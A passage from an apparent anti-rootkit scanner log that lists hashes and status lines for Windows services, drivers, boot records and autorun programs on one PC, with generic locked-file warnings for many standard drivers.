23:24:15.0860 0x18fc  Force sending object to P2P due to detect: vhdmp
23:24:15.0860 0x18fc  Object send P2P result: false
23:24:15.0870 0x18fc  [ E5689D93FFE4E5D66C0178761240DD54, 6D35CED80681B12AAF63BFA0DA1C386E71D3838839B68A686990AA8031949D27 ] viaide          C:\Windows\system32\DRIVERS\viaide.sys
23:24:15.0870 0x18fc  Suspicious file ( NoAccess ): C:\Windows\system32\DRIVERS\viaide.sys. md5: E5689D93FFE4E5D66C0178761240DD54, sha256: 6D35CED80681B12AAF63BFA0DA1C386E71D3838839B68A686990AA8031949D27
23:24:15.0870 0x18fc  viaide - detected LockedFile.Multi.Generic ( 1 )
23:24:15.0870 0x18fc  Object is SCO, delete is not allowed
23:24:15.0870 0x18fc  viaide ( LockedFile.Multi.Generic ) - warning
23:24:15.0890 0x18fc  [ 2B1A3DAE2B4E70DBBA822B7A03FBD4A3, 91F2B935E1E88C5542650F7D679A75D0562F4A5812179D1EC146D4B6351361E2 ] volmgr          C:\Windows\system32\DRIVERS\volmgr.sys
23:24:15.0890 0x18fc  Suspicious file ( NoAccess ): C:\Windows\system32\DRIVERS\volmgr.sys. md5: 2B1A3DAE2B4E70DBBA822B7A03FBD4A3, sha256: 91F2B935E1E88C5542650F7D679A75D0562F4A5812179D1EC146D4B6351361E2
23:24:15.0890 0x18fc  volmgr - detected LockedFile.Multi.Generic ( 1 )
23:24:15.0890 0x18fc  Object is SCO, delete is not allowed
23:24:15.0890 0x18fc  volmgr ( LockedFile.Multi.Generic ) - warning
23:24:15.0980 0x18fc  [ 99B0CBB569CA79ACAED8C91461D765FB, 5BE394A39A941DE2AA1212E66B7068F90D423FA816238657CB9B2DA8BBE69B9B ] volmgrx         C:\Windows\system32\drivers\volmgrx.sys
23:24:15.0980 0x18fc  Suspicious file ( NoAccess ): C:\Windows\system32\drivers\volmgrx.sys. md5: 99B0CBB569CA79ACAED8C91461D765FB, sha256: 5BE394A39A941DE2AA1212E66B7068F90D423FA816238657CB9B2DA8BBE69B9B
23:24:15.0980 0x18fc  volmgrx - detected LockedFile.Multi.Generic ( 1 )
23:24:15.0980 0x18fc  Object is SCO, delete is not allowed
23:24:15.0980 0x18fc  volmgrx ( LockedFile.Multi.Generic ) - warning
23:24:15.0980 0x18fc  Force sending object to P2P due to detect: volmgrx
23:24:15.0980 0x18fc  Object send P2P result: false
23:24:16.0040 0x18fc  [ 58F82EED8CA24B461441F9C3E4F0BF5C, 40B8C9C9D1BEDD1507138273A3C000C753C8765E1873F2170DE63555A042928C ] volsnap         C:\Windows\system32\DRIVERS\volsnap.sys
23:24:16.0040 0x18fc  Suspicious file ( NoAccess ): C:\Windows\system32\DRIVERS\volsnap.sys. md5: 58F82EED8CA24B461441F9C3E4F0BF5C, sha256: 40B8C9C9D1BEDD1507138273A3C000C753C8765E1873F2170DE63555A042928C
23:24:16.0040 0x18fc  volsnap - detected LockedFile.Multi.Generic ( 1 )
23:24:16.0040 0x18fc  Object is SCO, delete is not allowed
23:24:16.0040 0x18fc  volsnap ( LockedFile.Multi.Generic ) - warning
23:24:16.0040 0x18fc  Force sending object to P2P due to detect: volsnap
23:24:16.0040 0x18fc  Object send P2P result: false
23:24:16.0120 0x18fc  [ 5E2016EA6EBACA03C04FEAC5F330D997, 53106EB877459FE55A459111F7AB0EE320BB3B4C954D3DB6FA1642396001F2AC ] vsmraid         C:\Windows\system32\DRIVERS\vsmraid.sys
23:24:16.0120 0x18fc  Suspicious file ( NoAccess ): C:\Windows\system32\DRIVERS\vsmraid.sys. md5: 5E2016EA6EBACA03C04FEAC5F330D997, sha256: 53106EB877459FE55A459111F7AB0EE320BB3B4C954D3DB6FA1642396001F2AC
23:24:16.0120 0x18fc  vsmraid - detected LockedFile.Multi.Generic ( 1 )
23:24:16.0120 0x18fc  Object is SCO, delete is not allowed
23:24:16.0120 0x18fc  vsmraid ( LockedFile.Multi.Generic ) - warning
23:24:16.0120 0x18fc  Force sending object to P2P due to detect: vsmraid
23:24:16.0120 0x18fc  Object send P2P result: false
23:24:16.0370 0x18fc  [ 787898BF9FB6D7BD87A36E2D95C899BA, A6C0C7402B1A198E7B3D6D7D283FCB5815AC429DA68FC9B54C67707F3233CCB5 ] VSS             C:\Windows\system32\vssvc.exe
23:24:16.0522 0x18fc  VSS - ok
23:24:16.0542 0x18fc  [ 36D4720B72B5C5D9CB2B9C29E9DF67A1, 3254523C85C70EBA2DBAC05DB2DBA89EDF8E9195F390F7C21F96458FB6B2E3D7 ] vwifibus        C:\Windows\system32\DRIVERS\vwifibus.sys
23:24:16.0552 0x18fc  Suspicious file ( NoAccess ): C:\Windows\system32\DRIVERS\vwifibus.sys. md5: 36D4720B72B5C5D9CB2B9C29E9DF67A1, sha256: 3254523C85C70EBA2DBAC05DB2DBA89EDF8E9195F390F7C21F96458FB6B2E3D7
23:24:16.0552 0x18fc  vwifibus - detected LockedFile.Multi.Generic ( 1 )
23:24:16.0552 0x18fc  vwifibus ( LockedFile.Multi.Generic ) - warning
23:24:16.0552 0x18fc  Force sending object to P2P due to detect: vwifibus
23:24:16.0552 0x18fc  Object send P2P result: false
23:24:16.0562 0x18fc  [ 6A3D66263414FF0D6FA754C646612F3F, 30F6BA594B0D3B94113064015A16D97811CD989DF1715CCE21CEAB9894C1B4FB ] vwififlt        C:\Windows\system32\DRIVERS\vwififlt.sys
23:24:16.0562 0x18fc  Suspicious file ( NoAccess ): C:\Windows\system32\DRIVERS\vwififlt.sys. md5: 6A3D66263414FF0D6FA754C646612F3F, sha256: 30F6BA594B0D3B94113064015A16D97811CD989DF1715CCE21CEAB9894C1B4FB
23:24:16.0562 0x18fc  vwififlt - detected LockedFile.Multi.Generic ( 1 )
23:24:16.0562 0x18fc  vwififlt ( LockedFile.Multi.Generic ) - warning
23:24:16.0562 0x18fc  Force sending object to P2P due to detect: vwififlt
23:24:16.0562 0x18fc  Object send P2P result: false
23:24:16.0602 0x18fc  [ 1C9D80CC3849B3788048078C26486E1A, 34A89F31E53F6B6C209B286F580CC2257AE6D057E4E20741F241C9C167947962 ] W32Time         C:\Windows\system32\w32time.dll
23:24:16.0712 0x18fc  W32Time - ok
23:24:16.0742 0x18fc  [ 4E9440F4F152A7B944CB1663D3935A3E, 8FE04EBD3BC612EE943A21A3E56F37E5C9B578CDACA6044048181DAD81816D53 ] WacomPen        C:\Windows\system32\DRIVERS\wacompen.sys
23:24:16.0742 0x18fc  Suspicious file ( NoAccess ): C:\Windows\system32\DRIVERS\wacompen.sys. md5: 4E9440F4F152A7B944CB1663D3935A3E, sha256: 8FE04EBD3BC612EE943A21A3E56F37E5C9B578CDACA6044048181DAD81816D53
23:24:16.0742 0x18fc  WacomPen - detected LockedFile.Multi.Generic ( 1 )
23:24:16.0742 0x18fc  Object is SCO, delete is not allowed
23:24:16.0742 0x18fc  WacomPen ( LockedFile.Multi.Generic ) - warning
23:24:16.0742 0x18fc  Force sending object to P2P due to detect: WacomPen
23:24:16.0742 0x18fc  Object send P2P result: false
23:24:16.0762 0x18fc  [ 47CA49400643EFFD3F1C9A27E1D69324, 7EFD3405282264F7987172B226882FCDD223F771959B9CEBEBF9ECEA317D85B0 ] WANARP          C:\Windows\system32\DRIVERS\wanarp.sys
23:24:16.0762 0x18fc  Suspicious file ( NoAccess ): C:\Windows\system32\DRIVERS\wanarp.sys. md5: 47CA49400643EFFD3F1C9A27E1D69324, sha256: 7EFD3405282264F7987172B226882FCDD223F771959B9CEBEBF9ECEA317D85B0
23:24:16.0762 0x18fc  WANARP - detected LockedFile.Multi.Generic ( 1 )
23:24:16.0762 0x18fc  Object is SCO, delete is not allowed
23:24:16.0762 0x18fc  WANARP ( LockedFile.Multi.Generic ) - warning
23:24:16.0762 0x18fc  Force sending object to P2P due to detect: WANARP
23:24:16.0762 0x18fc  Object send P2P result: false
23:24:16.0762 0x18fc  [ 47CA49400643EFFD3F1C9A27E1D69324, 7EFD3405282264F7987172B226882FCDD223F771959B9CEBEBF9ECEA317D85B0 ] Wanarpv6        C:\Windows\system32\DRIVERS\wanarp.sys
23:24:16.0772 0x18fc  Suspicious file ( NoAccess ): C:\Windows\system32\DRIVERS\wanarp.sys. md5: 47CA49400643EFFD3F1C9A27E1D69324, sha256: 7EFD3405282264F7987172B226882FCDD223F771959B9CEBEBF9ECEA317D85B0
23:24:16.0772 0x18fc  Wanarpv6 - detected LockedFile.Multi.Generic ( 1 )
23:24:16.0772 0x18fc  Object is SCO, delete is not allowed
23:24:16.0772 0x18fc  Wanarpv6 ( LockedFile.Multi.Generic ) - warning
23:24:16.0892 0x18fc  [ 5AB1BB85BD8B5089CC5D64200DEDAE68, 28777D4F3CD07C8E3465B6DA0FCA994E0B93071A3A0D4D1D64C1DF633DD1C64F ] wbengine        C:\Windows\system32\wbengine.exe
23:24:17.0032 0x18fc  wbengine - ok
23:24:17.0062 0x18fc  [ 3AA101E8EDAB2DB4131333F4325C76A3, 4F7BD3DA5E58B18BFF106CFF7B45E75FD13EE556D433C695BA23EC80827E49DE ] WbioSrvc        C:\Windows\System32\wbiosrvc.dll
23:24:17.0082 0x18fc  WbioSrvc - ok
23:24:17.0102 0x18fc  [ 8321C2CA3B62B61B293CDA3451984468, 856A079C2CCC75D633EA23E410D7F3ECDF368EAAAFF634CB82DDA545FD3A2F9C ] wcncsvc         C:\Windows\System32\wcncsvc.dll
23:24:17.0152 0x18fc  wcncsvc - ok
23:24:17.0172 0x18fc  [ 20F7441334B18CEE52027661DF4A6129, 7B8E0247234B740FED2BE9B833E9CE8DD7453340123AB43F6B495A7E6A27B0DD ] WcsPlugInService C:\Windows\System32\WcsPlugInService.dll
23:24:17.0232 0x18fc  WcsPlugInService - ok
23:24:17.0252 0x18fc  [ 72889E16FF12BA0F235467D6091B17DC, F2FD0BBD075E33608D93F350D216F97442AB89ABD540513C2D568C78096E12A8 ] Wd              C:\Windows\system32\DRIVERS\wd.sys
23:24:17.0252 0x18fc  Suspicious file ( NoAccess ): C:\Windows\system32\DRIVERS\wd.sys. md5: 72889E16FF12BA0F235467D6091B17DC, sha256: F2FD0BBD075E33608D93F350D216F97442AB89ABD540513C2D568C78096E12A8
23:24:17.0252 0x18fc  Wd - detected LockedFile.Multi.Generic ( 1 )
23:24:17.0252 0x18fc  Object is SCO, delete is not allowed
23:24:17.0252 0x18fc  Wd ( LockedFile.Multi.Generic ) - warning
23:24:17.0302 0x18fc  [ 441BD2D7B4F98134C3A4F9FA570FD250, FF20815273014C5A27C2B75E2C70FE674809293627056199F502DFDF4CECFCA1 ] Wdf01000        C:\Windows\system32\drivers\Wdf01000.sys
23:24:17.0302 0x18fc  Suspicious file ( NoAccess ): C:\Windows\system32\drivers\Wdf01000.sys. md5: 441BD2D7B4F98134C3A4F9FA570FD250, sha256: FF20815273014C5A27C2B75E2C70FE674809293627056199F502DFDF4CECFCA1
23:24:17.0312 0x18fc  Wdf01000 - detected LockedFile.Multi.Generic ( 1 )
23:24:17.0312 0x18fc  Object is SCO, delete is not allowed
23:24:17.0312 0x18fc  Wdf01000 ( LockedFile.Multi.Generic ) - warning
23:24:17.0312 0x18fc  Force sending object to P2P due to detect: Wdf01000
23:24:17.0312 0x18fc  Object send P2P result: false
23:24:17.0352 0x18fc  [ BF1FC3F79B863C914687A737C2F3D681, B2DF47AC4931ACFB243775767B77065CC0D98778FC0243C793A3E219EB961209 ] WdiServiceHost  C:\Windows\system32\wdi.dll
23:24:17.0372 0x18fc  WdiServiceHost - ok
23:24:17.0382 0x18fc  [ BF1FC3F79B863C914687A737C2F3D681, B2DF47AC4931ACFB243775767B77065CC0D98778FC0243C793A3E219EB961209 ] WdiSystemHost   C:\Windows\system32\wdi.dll
23:24:17.0402 0x18fc  WdiSystemHost - ok
23:24:17.0442 0x18fc  [ 8A438CBB8C032A0C798B0C642FFBE572, 3200B9B6A7B87C1C47295FA416C99DE1FBB2DBBA3DA78D5CC88C26DCC4189D45 ] WebClient       C:\Windows\System32\webclnt.dll
23:24:17.0492 0x18fc  WebClient - ok
23:24:17.0522 0x18fc  [ C749025A679C5103E575E3B48E092C43, B71171D07EE7AB085A24BF3A1072FF2CE7EA021AAE695F6A90640E6EE8EB55C1 ] Wecsvc          C:\Windows\system32\wecsvc.dll
23:24:17.0582 0x18fc  Wecsvc - ok
23:24:17.0614 0x18fc  [ 7E591867422DC788B9E5BD337A669A08, 484E6BCCDF7ADCE9A1AACAD1BC7C7D7694B9E40FA90D94B14D80C607784F6C75 ] wercplsupport   C:\Windows\System32\wercplsupport.dll
23:24:17.0644 0x18fc  wercplsupport - ok
23:24:17.0674 0x18fc  [ 6D137963730144698CBD10F202E9F251, A9F522A125158D94F540544CCD4DBF47B9DCE2EA878C33675AFE40F80E8F4979 ] WerSvc          C:\Windows\System32\WerSvc.dll
23:24:17.0704 0x18fc  WerSvc - ok
23:24:17.0764 0x18fc  [ 611B23304BF067451A9FDEE01FBDD725, 0AF2734B978165FC6FD22B64862132CCE32528A21C698A49D176129446E099C8 ] WfpLwf          C:\Windows\system32\DRIVERS\wfplwf.sys
23:24:17.0764 0x18fc  Suspicious file ( NoAccess ): C:\Windows\system32\DRIVERS\wfplwf.sys. md5: 611B23304BF067451A9FDEE01FBDD725, sha256: 0AF2734B978165FC6FD22B64862132CCE32528A21C698A49D176129446E099C8
23:24:17.0764 0x18fc  WfpLwf - detected LockedFile.Multi.Generic ( 1 )
23:24:17.0764 0x18fc  WfpLwf ( LockedFile.Multi.Generic ) - warning
23:24:17.0784 0x18fc  [ 05ECAEC3E4529A7153B3136CEB49F0EC, 9995CB2CEC70A633EA33CBB0DEAD2BB28CB67132B41E9444BDAB9E75744C9A50 ] WIMMount        C:\Windows\system32\drivers\wimmount.sys
23:24:17.0784 0x18fc  Suspicious file ( NoAccess ): C:\Windows\system32\drivers\wimmount.sys. md5: 05ECAEC3E4529A7153B3136CEB49F0EC, sha256: 9995CB2CEC70A633EA33CBB0DEAD2BB28CB67132B41E9444BDAB9E75744C9A50
23:24:17.0784 0x18fc  WIMMount - detected LockedFile.Multi.Generic ( 1 )
23:24:17.0784 0x18fc  WIMMount ( LockedFile.Multi.Generic ) - warning
23:24:17.0784 0x18fc  Force sending object to P2P due to detect: WIMMount
23:24:17.0784 0x18fc  Object send P2P result: false
23:24:17.0794 0x18fc  WinDefend - ok
23:24:17.0804 0x18fc  WinHttpAutoProxySvc - ok
23:24:18.0054 0x18fc  [ 19B07E7E8915D701225DA41CB3877306, D6555E8D276DBB11358246E0FE215F76F1FB358791C76B88D82C2A66A42DA19F ] Winmgmt         C:\Windows\system32\wbem\WMIsvc.dll
23:24:18.0092 0x18fc  Winmgmt - ok
23:24:18.0366 0x18fc  [ 41FBB751936B387F9179E7F03A74FE29, 7A73D887BEC19DFC485ED42B4E6ABEBF824555139B81EA30731A00773E707464 ] WinRM           C:\Windows\system32\WsmSvc.dll
23:24:18.0526 0x18fc  WinRM - ok
23:24:18.0586 0x18fc  [ 817EAFF5D38674EDD7713B9DFB8E9791, F6E0BFC503BA7395F92989C11B454D1F1E58E29302BA203801449A2C5236E84D ] WinUsb          C:\Windows\system32\DRIVERS\WinUsb.sys
23:24:18.0586 0x18fc  Suspicious file ( NoAccess ): C:\Windows\system32\DRIVERS\WinUsb.sys. md5: 817EAFF5D38674EDD7713B9DFB8E9791, sha256: F6E0BFC503BA7395F92989C11B454D1F1E58E29302BA203801449A2C5236E84D
23:24:18.0596 0x18fc  WinUsb - detected LockedFile.Multi.Generic ( 1 )
23:24:18.0596 0x18fc  WinUsb ( LockedFile.Multi.Generic ) - warning
23:24:18.0596 0x18fc  Force sending object to P2P due to detect: WinUsb
23:24:18.0596 0x18fc  Object send P2P result: false
23:24:18.0716 0x18fc  [ 4FADA86E62F18A1B2F42BA18AE24E6AA, CE1683386886BF34862681A46199EA7E7FB4232A186047DA7FBD8EC240AF6726 ] Wlansvc         C:\Windows\System32\wlansvc.dll
23:24:18.0764 0x18fc  Wlansvc - ok
23:24:19.0188 0x18fc  [ 357CABBF155AFD1D3926E62539D2A3A7, C43CFF84E7D930B4999DC061AB0766B57AAD7540B3E6EE54605B10ECE90825F5 ] wlidsvc         C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE
23:24:19.0248 0x18fc  wlidsvc - ok
23:24:19.0308 0x18fc  [ F6FF8944478594D0E414D3F048F0D778, 6F75E0AE6127B33A92A88E59D4B048FD4C15F997807BE7BF0EFE76F95235B1D9 ] WmiAcpi         C:\Windows\system32\DRIVERS\wmiacpi.sys
23:24:19.0308 0x18fc  Suspicious file ( NoAccess ): C:\Windows\system32\DRIVERS\wmiacpi.sys. md5: F6FF8944478594D0E414D3F048F0D778, sha256: 6F75E0AE6127B33A92A88E59D4B048FD4C15F997807BE7BF0EFE76F95235B1D9
23:24:19.0308 0x18fc  WmiAcpi - detected LockedFile.Multi.Generic ( 1 )
23:24:19.0308 0x18fc  Object is SCO, delete is not allowed
23:24:19.0308 0x18fc  WmiAcpi ( LockedFile.Multi.Generic ) - warning
23:24:19.0308 0x18fc  Force sending object to P2P due to detect: WmiAcpi
23:24:19.0308 0x18fc  Object send P2P result: false
23:24:19.0418 0x18fc  [ 38B84C94C5A8AF291ADFEA478AE54F93, 1AC267AC73670BEA5F3785C9AD9DB146F8E993A862C843742B21FDB90D102B2A ] wmiApSrv        C:\Windows\system32\wbem\WmiApSrv.exe
23:24:19.0448 0x18fc  wmiApSrv - ok
23:24:19.0508 0x18fc  WMPNetworkSvc - ok
23:24:19.0538 0x18fc  [ 96C6E7100D724C69FCF9E7BF590D1DCA, 2E63C9B0893B4FC03B7A71BAEA6202D3D3DB1B52F3643467829B5A573FD7655B ] WPCSvc          C:\Windows\System32\wpcsvc.dll
23:24:19.0566 0x18fc  WPCSvc - ok
23:24:19.0580 0x18fc  [ 2E57DDF2880A7E52E76F41C7E96D327B, D24E19B6091C197D77D71BC044CE2E5A57BE0A2F00D1BB0732E380A398230E63 ] WPDBusEnum      C:\Windows\system32\wpdbusenum.dll
23:24:19.0610 0x18fc  WPDBusEnum - ok
23:24:19.0630 0x18fc  [ 6BCC1D7D2FD2453957C5479A32364E52, E48554D31FBDCF8F985C1C72524CAA9106F5B7CC2B79064F8F5E2562D517F090 ] ws2ifsl         C:\Windows\system32\drivers\ws2ifsl.sys
23:24:19.0630 0x18fc  Suspicious file ( NoAccess ): C:\Windows\system32\drivers\ws2ifsl.sys. md5: 6BCC1D7D2FD2453957C5479A32364E52, sha256: E48554D31FBDCF8F985C1C72524CAA9106F5B7CC2B79064F8F5E2562D517F090
23:24:19.0630 0x18fc  ws2ifsl - detected LockedFile.Multi.Generic ( 1 )
23:24:19.0630 0x18fc  Object is SCO, delete is not allowed
23:24:19.0630 0x18fc  ws2ifsl ( LockedFile.Multi.Generic ) - warning
23:24:19.0640 0x18fc  [ E8B1FE6669397D1772D8196DF0E57A9E, 39FE0819360719F756BD31A1884A0508A1E2371ACC723E25E005CBEC0A7B02FA ] wscsvc          C:\Windows\System32\wscsvc.dll
23:24:19.0683 0x18fc  wscsvc - ok
23:24:19.0687 0x18fc  WSearch - ok
23:24:19.0742 0x18fc  [ D487F57B9E1A7C4C8EC9C53785064E8D, DE9F87DB5F99CDD300AB81FD067C54CD728885D79BF7282EB8CA70AB191278D6 ] wStLib64        C:\Windows\system32\drivers\wStLib64.sys
23:24:19.0742 0x18fc  Suspicious file ( NoAccess ): C:\Windows\system32\drivers\wStLib64.sys. md5: D487F57B9E1A7C4C8EC9C53785064E8D, sha256: DE9F87DB5F99CDD300AB81FD067C54CD728885D79BF7282EB8CA70AB191278D6
23:24:19.0742 0x18fc  wStLib64 - detected LockedFile.Multi.Generic ( 1 )
23:24:19.0742 0x18fc  wStLib64 ( LockedFile.Multi.Generic ) - warning
23:24:19.0842 0x18fc  [ 38340204A2D0228F1E87740FC5E554A7, 57181ED34E73DD17B590803C770A086C57754F229C6F587637B8FBB5D6519603 ] wuauserv        C:\Windows\system32\wuaueng.dll
23:24:20.0006 0x18fc  wuauserv - ok
23:24:20.0026 0x18fc  [ 7CADC74271DD6461C452C271B30BD378, D58C2094C36FC665C03A6A269EED80DC71F330C3DCF40A27A3C8F56AB7A96861 ] WudfPf          C:\Windows\system32\drivers\WudfPf.sys
23:24:20.0026 0x18fc  Suspicious file ( NoAccess ): C:\Windows\system32\drivers\WudfPf.sys. md5: 7CADC74271DD6461C452C271B30BD378, sha256: D58C2094C36FC665C03A6A269EED80DC71F330C3DCF40A27A3C8F56AB7A96861
23:24:20.0026 0x18fc  WudfPf - detected LockedFile.Multi.Generic ( 1 )
23:24:20.0026 0x18fc  Object is SCO, delete is not allowed
23:24:20.0026 0x18fc  WudfPf ( LockedFile.Multi.Generic ) - warning
23:24:20.0086 0x18fc  [ 3B197AF0FFF08AA66B6B2241CA538D64, BC94E5EFF38B9C6A37717B2A6CA56679781A4872A0C4298056E074033571BE79 ] WUDFRd          C:\Windows\system32\DRIVERS\WUDFRd.sys
23:24:20.0086 0x18fc  Suspicious file ( NoAccess ): C:\Windows\system32\DRIVERS\WUDFRd.sys. md5: 3B197AF0FFF08AA66B6B2241CA538D64, sha256: BC94E5EFF38B9C6A37717B2A6CA56679781A4872A0C4298056E074033571BE79
23:24:20.0086 0x18fc  WUDFRd - detected LockedFile.Multi.Generic ( 1 )
23:24:20.0086 0x18fc  Object is SCO, delete is not allowed
23:24:20.0086 0x18fc  WUDFRd ( LockedFile.Multi.Generic ) - warning
23:24:20.0116 0x18fc  [ B551D6637AA0E132C18AC6E504F7B79B, FA6495533A14E01ABB0F6689AB7503B1B439D3ADA7457DFCB7D81714A9817327 ] wudfsvc         C:\Windows\System32\WUDFSvc.dll
23:24:20.0166 0x18fc  wudfsvc - ok
23:24:20.0186 0x18fc  [ 9A3452B3C2A46C073166C5CF49FAD1AE, D6F95F51D8E37BA4CF403965EC08CCFEEA9EEFDBFC7752432EAEC19925BDA115 ] WwanSvc         C:\Windows\System32\wwansvc.dll
23:24:20.0236 0x18fc  WwanSvc - ok
23:24:20.0306 0x18fc  [ 2EE48CFCE7CA8E0DB4C44C7476C0943B, 2C324592F3F2D50BABA7123B6F9FC922667CC132777E019FF615F2D6F273A45E ] xusb21          C:\Windows\system32\DRIVERS\xusb21.sys
23:24:20.0306 0x18fc  Suspicious file ( NoAccess ): C:\Windows\system32\DRIVERS\xusb21.sys. md5: 2EE48CFCE7CA8E0DB4C44C7476C0943B, sha256: 2C324592F3F2D50BABA7123B6F9FC922667CC132777E019FF615F2D6F273A45E
23:24:20.0306 0x18fc  xusb21 - detected LockedFile.Multi.Generic ( 1 )
23:24:20.0306 0x18fc  xusb21 ( LockedFile.Multi.Generic ) - warning
23:24:20.0366 0x18fc  [ 99217BD11BEE7F21E873F6E39B93AAFD, CF933ED9EEB02427BCAC02CDE32AE01D86D4D535BAC7E2EA473B04C2FDCCCBC9 ] ZSMC301b        C:\Windows\system32\Drivers\usbVM31b.sys
23:24:20.0366 0x18fc  Suspicious file ( NoAccess ): C:\Windows\system32\Drivers\usbVM31b.sys. md5: 99217BD11BEE7F21E873F6E39B93AAFD, sha256: CF933ED9EEB02427BCAC02CDE32AE01D86D4D535BAC7E2EA473B04C2FDCCCBC9
23:24:20.0366 0x18fc  ZSMC301b - detected LockedFile.Multi.Generic ( 1 )
23:24:20.0366 0x18fc  ZSMC301b ( LockedFile.Multi.Generic ) - warning
23:24:20.0366 0x18fc  Force sending object to P2P due to detect: ZSMC301b
23:24:20.0366 0x18fc  Object send P2P result: false
23:24:20.0396 0x18fc  ================ Scan global ===============================
23:24:20.0416 0x18fc  [ BA0CD8C393E8C9F83354106093832C7B, 18D8A4780A2BAA6CEF7FBBBDA0EF6BF2DADF146E1E578A618DD5859E8ADBF1A8 ] C:\Windows\system32\basesrv.dll
23:24:20.0456 0x18fc  [ 457B44AB6D502E55F64A867D4F35C76C, 95FEC45E28DF394E778DA37719F7D579920531AD568E1C290B7F42CB03BEAA2C ] C:\Windows\system32\winsrv.dll
23:24:20.0476 0x18fc  [ 457B44AB6D502E55F64A867D4F35C76C, 95FEC45E28DF394E778DA37719F7D579920531AD568E1C290B7F42CB03BEAA2C ] C:\Windows\system32\winsrv.dll
23:24:20.0496 0x18fc  [ D6160F9D869BA3AF0B787F971DB56368, 0033E6212DD8683E4EE611B290931FDB227B4795F0B17C309DC686C696790529 ] C:\Windows\system32\sxssrv.dll
23:24:20.0537 0x18fc  [ 24ACB7E5BE595468E3B9AA488B9B4FCB, 63541E3432FCE953F266AE553E7A394978D6EE3DB52388D885F668CF42C5E7E2 ] C:\Windows\system32\services.exe
23:24:20.0544 0x18fc  [ Global ] - ok
23:24:20.0544 0x18fc  ================ Scan MBR ==================================
23:24:20.0552 0x18fc  [ A36C5E4F47E84449FF07ED3517B43A31 ] \Device\Harddisk0\DR0
23:24:21.0190 0x18fc  \Device\Harddisk0\DR0 - ok
23:24:21.0190 0x18fc  ================ Scan VBR ==================================
23:24:21.0200 0x18fc  [ 9B65B7D2FEA29E4ABE2A795443D44F03 ] \Device\Harddisk0\DR0\Partition1
23:24:21.0230 0x18fc  \Device\Harddisk0\DR0\Partition1 - ok
23:24:21.0260 0x18fc  [ 96F85DF2BD81F90E249CFB8A57AEFA50 ] \Device\Harddisk0\DR0\Partition2
23:24:21.0330 0x18fc  \Device\Harddisk0\DR0\Partition2 - ok
23:24:21.0330 0x18fc  ================ Scan generic autorun ======================
23:24:21.0670 0x18fc  [ C3DEFB0B48ED819E6C794E13D1544F19, BBB7B73FED61A5CCC391700D24B9EAF333528820B7697EEB010EBD9EC17FDF9E ] C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
23:24:21.0951 0x18fc  RtHDVCpl - ok
23:24:22.0101 0x18fc  [ 9DFE8B0B6C982C31144CED1795304A60, DFE0253CD9DEE63D94F7538833048F48BFBDAC39B18A17F1CAE7413B94A8DE4D ] C:\Program Files\ASRock\XFast LAN\cFosSpeed.exe
23:24:22.0161 0x18fc  XFast LAN - ok
23:24:22.0291 0x18fc  [ 076B3EE149E01ADBAC2DC529554A3FD9, 4F65D9D2EE44829AA2264210112851E899165C2346489BEBE679C41420CF7D07 ] C:\Program Files\iTunes\iTunesHelper.exe
23:24:22.0301 0x18fc  iTunesHelper - ok
23:24:22.0773 0x18fc  [ 4B6FB7DE94D91974950976108D2B837E, 8F6FD897DA2DE048020679AE1309922EC41DDA87FB57FB195292A2B8A73665A4 ] C:\Program Files (x86)\XFastUSB\XFastUsb.exe
23:24:22.0913 0x18fc  XFastUSB - ok
23:24:23.0033 0x18fc  [ 69B16C7B7746BA5C642FC05B3561FC73, 0DECEB6B1B7A2DD1F13133AC7328FF420DAD4610CEE1FA7466E8E0F6BAA39116 ] C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Reader_sl.exe
23:24:23.0043 0x18fc  Adobe Reader Speed Launcher - ok
23:24:23.0445 0x18fc  [ AF49D1C79EA49A7833017F290EE63B82, FFE98E8F6AE3BFAB324B3A7C6C6C00545C597A6861CBDD82ACE97591C6A1D287 ] C:\Program Files (x86)\Spybot - Search & Destroy 2\SDTray.exe
23:24:23.0565 0x18fc  SDTray - ok
23:24:23.0725 0x18fc  [ FD322D747CDEC7E028616916244648BB, 79B4D1342F4A9A668B3877B35ED3A1DD03A158B171932931037826511D44DCDF ] C:\Program Files\PowerISO\PWRISOVM.EXE
23:24:23.0735 0x18fc  PWRISOVM.EXE - ok
23:24:24.0015 0x18fc  [ 67BD916F01424DEB8AB8CD9E0096F277, D1E4A7BA332DA229138E89E5C4550A58ADD896B85728DF6BA33F1DE57D586E77 ] C:\Program Files (x86)\Microsoft Office\Office14\BCSSync.exe
23:24:24.0025 0x18fc  BCSSync - ok
23:24:24.0145 0x18fc  [ 5B6E8E09BE6401A7E022F52FDFCB2FF8, 471C556CF9405BBB380A8CEFE945C126B954B7C94F79CC72441B51F80141FC5E ] C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
23:24:24.0165 0x18fc  SunJavaUpdateSched - ok
23:24:24.0265 0x18fc  [ 938194BCFB3B9F3D63824EC60BCB69A1, 08A21D60C46974F77B0B882362FB344535D258C091C5162A38875DCCD9ED834D ] C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\amd64\CLIStart.exe
23:24:24.0305 0x18fc  StartCCC - ok
23:24:24.0555 0x18fc  [ 2EBE05FD8ECBA5F230FC26E534E91A11, B8E85D51BD4E6C0D4D447DFA327EAA0AE4A33F04F42063A58122153933C1770E ] C:\Program Files (x86)\Citrix\ICA Client\concentr.exe
23:24:24.0574 0x18fc  ConnectionCenter - ok
23:24:24.0597 0x18fc  [ 17D9622BFE68386E8C647C4C7F8FEA3E, 50F943F2E47512DCE61A9EBB188361CB71CACC74D9397FA1367AB7112F2C7A09 ] C:\Program Files (x86)\Citrix\ICA Client\redirector.exe
23:24:24.0607 0x18fc  Redirector - ok
23:24:24.0719 0x18fc  [ 2D43D1A4913FDA91D2932BABE95BACD9, 9B9F6A0DA49D73971F4EABC04E34F466B4E8D6A34CFE7A518878E740DA92198C ] C:\Program Files (x86)\Raptr Inc\Raptr\raptrstub.exe
23:24:24.0739 0x18fc  Raptr - ok
23:24:24.0739 0x18fc   - ok
23:24:24.0769 0x18fc  [ A993D6B4D5C1876A282F26AB3017DB30, B7FECE3FDB22C165E1838CC94918C90BFAD81D578BE87DF14D1AECFAE2363228 ] C:\Program Files (x86)\Raptr Inc\PlaysTV\playstv_launcher.exe
23:24:24.0779 0x18fc  PlaysTV - ok
23:24:25.0529 0x18fc  [ A97BC7CE8465551393872C6677FA6AF1, DDCF29A0EC321D499AAACE90796E67B0EE351F9303FCD705838E01754C8B657C ] C:\Program Files\AVAST Software\Avast\AvastUI.exe
